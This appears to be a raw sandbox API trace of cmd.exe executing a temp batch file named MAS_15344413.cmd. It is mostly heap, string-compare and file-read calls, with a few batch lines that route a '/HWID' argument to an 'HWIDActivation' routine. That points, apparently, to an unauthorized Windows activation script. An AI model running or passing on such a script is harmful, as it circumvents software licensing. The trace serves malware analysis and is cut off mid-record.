[0179.556] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0b70 [0179.556] GetProcessHeap () returned 0x19a8f1e0000 [0179.556] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1ec940 [0179.556] GetProcessHeap () returned 0x19a8f1e0000 [0179.556] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x26) returned 0x19a8f1eb9e0 [0179.556] GetProcessHeap () returned 0x19a8f1e0000 [0179.556] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ede90 [0179.556] GetProcessHeap () returned 0x19a8f1e0000 [0179.556] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee6d0 [0179.556] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0179.556] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0179.556] _wcsicmp (_String1="IF", _String2="set") returned -10 [0179.556] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0179.556] _wcsicmp (_String1="REM", _String2="set") returned -1 [0179.556] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0179.556] GetProcessHeap () returned 0x19a8f1e0000 [0179.556] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edf50 [0179.556] GetProcessHeap () returned 0x19a8f1e0000 [0179.556] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec7c0 [0179.556] GetProcessHeap () returned 0x19a8f1e0000 [0179.556] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x3a) returned 0x19a8f1f9310 [0179.556] GetProcessHeap () returned 0x19a8f1e0000 [0179.557] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee490 [0179.557] GetProcessHeap () returned 0x19a8f1e0000 [0179.557] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee790 [0179.557] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0179.557] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0179.557] _wcsicmp (_String1="IF", _String2="set") returned -10 [0179.557] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0179.557] _wcsicmp (_String1="REM", _String2="set") returned -1 [0179.557] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0179.557] GetProcessHeap () returned 0x19a8f1e0000 [0179.557] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee0d0 [0179.557] GetProcessHeap () returned 0x19a8f1e0000 [0179.557] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec720 [0179.557] GetProcessHeap () returned 0x19a8f1e0000 [0179.557] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x24) returned 0x19a8f1eb740 [0179.557] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0179.557] _tell (_FileHandle=3) returned 7858 [0179.557] _close (_FileHandle=3) returned 0 [0179.557] GetEnvironmentVariableW (in: lpName="_args", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0179.557] _wcsicmp (_String1="_args", _String2="CD") returned -4 [0179.558] _wcsicmp (_String1="_args", _String2="ERRORLEVEL") returned -6 [0179.558] _wcsicmp (_String1="_args", _String2="CMDEXTVERSION") returned -4 [0179.558] _wcsicmp (_String1="_args", _String2="CMDCMDLINE") returned -4 [0179.558] _wcsicmp (_String1="_args", _String2="DATE") returned -5 [0179.558] _wcsicmp (_String1="_args", _String2="TIME") returned -21 [0179.558] _wcsicmp (_String1="_args", _String2="RANDOM") returned -19 [0179.558] _wcsicmp (_String1="_args", _String2="HIGHESTNUMANODENUMBER") returned -9 [0179.558] _get_osfhandle (_FileHandle=1) returned 0x24 [0179.558] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0179.561] _get_osfhandle (_FileHandle=1) returned 0x24 [0179.561] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0179.561] _get_osfhandle (_FileHandle=0) returned 0x20 [0179.561] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0179.562] SetConsoleInputExeNameW () returned 0x1 [0179.562] GetConsoleOutputCP () returned 0x1b5 [0179.562] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0179.562] SetThreadUILanguage (LangId=0x0) returned 0x409 [0179.563] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.563] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0179.563] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.563] SetFilePointer (in: hFile=0xa0, lDistanceToMove=7858, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1eb2 [0179.563] GetProcessHeap () returned 0x19a8f1e0000 [0179.564] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb740) returned 1 [0179.564] GetProcessHeap () returned 0x19a8f1e0000 [0179.564] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec720) returned 1 [0179.564] GetProcessHeap () returned 0x19a8f1e0000 [0179.565] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee0d0) returned 1 [0179.565] GetProcessHeap () returned 0x19a8f1e0000 [0179.565] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee790) returned 1 [0179.566] GetProcessHeap () returned 0x19a8f1e0000 [0179.566] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee490) returned 1 [0179.566] GetProcessHeap () returned 0x19a8f1e0000 [0179.567] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f9310) returned 1 [0179.567] GetProcessHeap () returned 0x19a8f1e0000 [0179.567] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec7c0) returned 1 [0179.567] GetProcessHeap () returned 0x19a8f1e0000 [0179.568] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edf50) returned 1 [0179.568] GetProcessHeap () returned 0x19a8f1e0000 [0179.568] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee6d0) returned 1 [0179.568] GetProcessHeap () returned 0x19a8f1e0000 [0179.568] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ede90) returned 1 [0179.569] GetProcessHeap () returned 0x19a8f1e0000 [0179.569] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb9e0) returned 1 [0179.569] GetProcessHeap () returned 0x19a8f1e0000 [0179.569] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec940) returned 1 [0179.569] GetProcessHeap () returned 0x19a8f1e0000 [0179.569] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0b70) returned 1 [0179.569] GetProcessHeap () returned 0x19a8f1e0000 [0179.570] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecaa0) returned 1 [0179.570] GetProcessHeap () returned 0x19a8f1e0000 [0179.570] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0a70) returned 1 [0179.570] GetProcessHeap () returned 0x19a8f1e0000 [0179.570] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb980) returned 1 [0179.570] GetProcessHeap () returned 0x19a8f1e0000 [0179.570] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb920) returned 1 [0179.571] GetProcessHeap () returned 0x19a8f1e0000 [0179.571] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eddd0) returned 1 [0179.571] GetProcessHeap () returned 0x19a8f1e0000 [0179.571] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edd10) returned 1 [0179.571] GetProcessHeap () returned 0x19a8f1e0000 [0179.571] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb950) returned 1 [0179.571] GetProcessHeap () returned 0x19a8f1e0000 [0179.572] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb710) returned 1 [0179.572] GetProcessHeap () returned 0x19a8f1e0000 [0179.572] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edc50) returned 1 [0179.572] GetProcessHeap () returned 0x19a8f1e0000 [0179.572] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0179.572] GetProcessHeap () returned 0x19a8f1e0000 [0179.572] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6e0) returned 1 [0179.572] GetProcessHeap () returned 0x19a8f1e0000 [0179.573] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6b0) returned 1 [0179.573] GetProcessHeap () returned 0x19a8f1e0000 [0179.573] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edb90) returned 1 [0179.574] GetProcessHeap () returned 0x19a8f1e0000 [0179.574] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb800) returned 1 [0179.574] GetProcessHeap () returned 0x19a8f1e0000 [0179.574] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec900) returned 1 [0179.574] GetProcessHeap () returned 0x19a8f1e0000 [0179.575] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee3d0) returned 1 [0179.575] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.575] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1eb2 [0179.575] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0179.576] SetFilePointer (in: hFile=0xa0, lDistanceToMove=7916, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1eec [0179.576] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if defined _args echo \"%_args%\" | find /i \"/\" %nul% && (\r\n", cbMultiByte=58, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="if defined _args echo \"%_args%\" | find /i \"/\" %nul% && (\r\net \"_silent=%nul%\") || (set _silent=)\r\n=========================================\r\n") returned 58 [0179.576] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.576] GetFileType (hFile=0xa0) returned 0x1 [0179.576] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.576] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1eec [0179.576] GetProcessHeap () returned 0x19a8f1e0000 [0179.576] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f207830 [0179.577] GetProcessHeap () returned 0x19a8f1e0000 [0179.577] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f20d9b0 [0179.578] GetProcessHeap () returned 0x19a8f1e0000 [0179.578] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb710 [0179.579] GetEnvironmentVariableW (in: lpName="_args", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0179.579] _wcsicmp (_String1="_args", _String2="CD") returned -4 [0179.579] _wcsicmp (_String1="_args", _String2="ERRORLEVEL") returned -6 [0179.579] _wcsicmp (_String1="_args", _String2="CMDEXTVERSION") returned -4 [0179.579] _wcsicmp (_String1="_args", _String2="CMDCMDLINE") returned -4 [0179.579] _wcsicmp (_String1="_args", _String2="DATE") returned -5 [0179.579] _wcsicmp (_String1="_args", _String2="TIME") returned -21 [0179.579] _wcsicmp (_String1="_args", _String2="RANDOM") returned -19 [0179.579] _wcsicmp (_String1="_args", _String2="HIGHESTNUMANODENUMBER") returned -9 [0179.579] GetProcessHeap () returned 0x19a8f1e0000 [0179.579] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb710) returned 1 [0179.579] GetProcessHeap () returned 0x19a8f1e0000 [0179.580] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0179.582] GetProcessHeap () returned 0x19a8f1e0000 [0179.582] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f20d9b0 [0179.583] GetProcessHeap () returned 0x19a8f1e0000 [0179.583] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecaa0 [0179.583] GetEnvironmentVariableW (in: lpName="nul", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x9 [0179.583] GetProcessHeap () returned 0x19a8f1e0000 [0179.583] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecaa0) returned 1 [0179.583] GetProcessHeap () returned 0x19a8f1e0000 [0179.584] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0179.584] GetProcessHeap () returned 0x19a8f1e0000 [0179.585] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f207830) returned 1 [0179.585] _wcsicmp (_String1="if", _String2=")") returned 64 [0179.585] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0179.585] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0179.585] _wcsicmp (_String1="IF", _String2="if") returned 0 [0179.585] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0179.585] GetProcessHeap () returned 0x19a8f1e0000 [0179.585] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee9d0 [0179.585] GetProcessHeap () returned 0x19a8f1e0000 [0179.585] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1ec800 [0179.585] GetProcessHeap () returned 0x19a8f1e0000 [0179.585] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x30) returned 0x19a8f1e0e30 [0179.585] GetProcessHeap () returned 0x19a8f1e0000 [0179.585] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e0e30, Size=0x22) returned 0x19a8f1eb800 [0179.585] GetProcessHeap () returned 0x19a8f1e0000 [0179.585] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb800) returned 0x22 [0179.585] _wcsicmp (_String1="defined", _String2="/I") returned 53 [0179.585] GetProcessHeap () returned 0x19a8f1e0000 [0179.585] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee310 [0179.585] GetProcessHeap () returned 0x19a8f1e0000 [0179.585] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb770 [0179.586] _wcsicmp (_String1="ERRORLEVEL", _String2="defined") returned 1 [0179.586] _wcsicmp (_String1="EXIST", _String2="defined") returned 1 [0179.586] _wcsicmp (_String1="CMDEXTVERSION", _String2="defined") returned -1 [0179.586] _wcsicmp (_String1="DEFINED", _String2="defined") returned 0 [0179.586] GetProcessHeap () returned 0x19a8f1e0000 [0179.586] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb9e0 [0179.586] GetProcessHeap () returned 0x19a8f1e0000 [0179.586] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb860 [0179.586] GetProcessHeap () returned 0x19a8f1e0000 [0179.586] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb860, Size=0x1e) returned 0x19a8f1eb8f0 [0179.586] GetProcessHeap () returned 0x19a8f1e0000 [0179.586] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb8f0) returned 0x1e [0179.586] _wcsicmp (_String1="echo", _String2=")") returned 60 [0179.586] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0179.586] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0179.586] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0179.586] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0179.586] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0179.586] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0179.586] GetProcessHeap () returned 0x19a8f1e0000 [0179.586] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edc50 [0179.586] GetProcessHeap () returned 0x19a8f1e0000 [0179.586] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb860 [0179.586] GetProcessHeap () returned 0x19a8f1e0000 [0179.586] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb920 [0179.586] GetProcessHeap () returned 0x19a8f1e0000 [0179.586] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee6d0 [0179.586] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0179.586] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0179.586] _wcsicmp (_String1="IF", _String2="find") returned 3 [0179.586] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0179.587] _wcsicmp (_String1="REM", _String2="find") returned 12 [0179.587] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0179.587] GetProcessHeap () returned 0x19a8f1e0000 [0179.587] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee790 [0179.587] GetProcessHeap () returned 0x19a8f1e0000 [0179.587] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb950 [0179.587] GetProcessHeap () returned 0x19a8f1e0000 [0179.587] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x22) returned 0x19a8f1eb710 [0179.587] GetProcessHeap () returned 0x19a8f1e0000 [0179.587] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e09f0 [0179.587] GetProcessHeap () returned 0x19a8f1e0000 [0179.587] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecba0 [0179.587] GetProcessHeap () returned 0x19a8f1e0000 [0179.587] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0e70 [0179.587] GetProcessHeap () returned 0x19a8f1e0000 [0179.587] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1ec860 [0179.587] GetProcessHeap () returned 0x19a8f1e0000 [0179.587] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x24) returned 0x19a8f1eb740 [0179.587] GetProcessHeap () returned 0x19a8f1e0000 [0179.587] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edb90 [0179.587] GetProcessHeap () returned 0x19a8f1e0000 [0179.587] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edd10 [0179.587] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.587] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1eec [0179.587] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efeb90, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efeb90*=0x1fff, lpOverlapped=0x0) returned 1 [0179.588] SetFilePointer (in: hFile=0xa0, lDistanceToMove=8034, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1f62 [0179.588] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo \"%_args%\" | find /i \"/HWID\" %nul% && (setlocal & cls & (call :HWIDActivation %_args% %_silent%) & endlocal)\r\n", cbMultiByte=118, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo \"%_args%\" | find /i \"/HWID\" %nul% && (setlocal & cls & (call :HWIDActivation %_args% %_silent%) & endlocal)\r\n====================\r\n") returned 118 [0179.588] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.588] GetFileType (hFile=0xa0) returned 0x1 [0179.588] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.588] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1f62 [0179.588] GetProcessHeap () returned 0x19a8f1e0000 [0179.588] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f207830 [0179.588] GetProcessHeap () returned 0x19a8f1e0000 [0179.588] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f20d9b0 [0179.589] GetProcessHeap () returned 0x19a8f1e0000 [0179.589] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb980 [0179.589] GetEnvironmentVariableW (in: lpName="_args", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0179.589] _wcsicmp (_String1="_args", _String2="CD") returned -4 [0179.589] _wcsicmp (_String1="_args", _String2="ERRORLEVEL") returned -6 [0179.589] _wcsicmp (_String1="_args", _String2="CMDEXTVERSION") returned -4 [0179.589] _wcsicmp (_String1="_args", _String2="CMDCMDLINE") returned -4 [0179.589] _wcsicmp (_String1="_args", _String2="DATE") returned -5 [0179.589] _wcsicmp (_String1="_args", _String2="TIME") returned -21 [0179.589] _wcsicmp (_String1="_args", _String2="RANDOM") returned -19 [0179.589] _wcsicmp (_String1="_args", _String2="HIGHESTNUMANODENUMBER") returned -9 [0179.589] GetProcessHeap () returned 0x19a8f1e0000 [0179.589] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb980) returned 1 [0179.589] GetProcessHeap () returned 0x19a8f1e0000 [0179.590] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0179.590] GetProcessHeap () returned 0x19a8f1e0000 [0179.590] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f20d9b0 [0179.590] GetProcessHeap () returned 0x19a8f1e0000 [0179.590] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec7c0 [0179.590] GetEnvironmentVariableW (in: lpName="nul", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x9 [0179.590] GetProcessHeap () returned 0x19a8f1e0000 [0179.590] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec7c0) returned 1 [0179.590] GetProcessHeap () returned 0x19a8f1e0000 [0179.591] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0179.591] GetProcessHeap () returned 0x19a8f1e0000 [0179.591] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f20d9b0 [0179.592] GetProcessHeap () returned 0x19a8f1e0000 [0179.592] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb980 [0179.592] GetEnvironmentVariableW (in: lpName="_args", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0179.592] _wcsicmp (_String1="_args", _String2="CD") returned -4 [0179.592] _wcsicmp (_String1="_args", _String2="ERRORLEVEL") returned -6 [0179.592] _wcsicmp (_String1="_args", _String2="CMDEXTVERSION") returned -4 [0179.592] _wcsicmp (_String1="_args", _String2="CMDCMDLINE") returned -4 [0179.592] _wcsicmp (_String1="_args", _String2="DATE") returned -5 [0179.592] _wcsicmp (_String1="_args", _String2="TIME") returned -21 [0179.592] _wcsicmp (_String1="_args", _String2="RANDOM") returned -19 [0179.592] _wcsicmp (_String1="_args", _String2="HIGHESTNUMANODENUMBER") returned -9 [0179.592] GetProcessHeap () returned 0x19a8f1e0000 [0179.592] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb980) returned 1 [0179.592] GetProcessHeap () returned 0x19a8f1e0000 [0179.593] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0179.593] GetProcessHeap () returned 0x19a8f1e0000 [0179.593] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f20d9b0 [0179.593] GetProcessHeap () returned 0x19a8f1e0000 [0179.593] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb980 [0179.593] GetEnvironmentVariableW (in: lpName="_silent", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0179.594] _wcsicmp (_String1="_silent", _String2="CD") returned -4 [0179.594] _wcsicmp (_String1="_silent", _String2="ERRORLEVEL") returned -6 [0179.594] _wcsicmp (_String1="_silent", _String2="CMDEXTVERSION") returned -4 [0179.594] _wcsicmp (_String1="_silent", _String2="CMDCMDLINE") returned -4 [0179.594] _wcsicmp (_String1="_silent", _String2="DATE") returned -5 [0179.594] _wcsicmp (_String1="_silent", _String2="TIME") returned -21 [0179.594] _wcsicmp (_String1="_silent", _String2="RANDOM") returned -19 [0179.594] _wcsicmp (_String1="_silent", _String2="HIGHESTNUMANODENUMBER") returned -9 [0179.594] GetProcessHeap () returned 0x19a8f1e0000 [0179.594] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb980) returned 1 [0179.594] GetProcessHeap () returned 0x19a8f1e0000 [0179.595] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0179.596] GetProcessHeap () returned 0x19a8f1e0000 [0179.596] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f207830) returned 1 [0179.597] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0179.597] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0179.597] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0179.597] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0179.597] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0179.598] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0179.598] GetProcessHeap () returned 0x19a8f1e0000 [0179.598] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 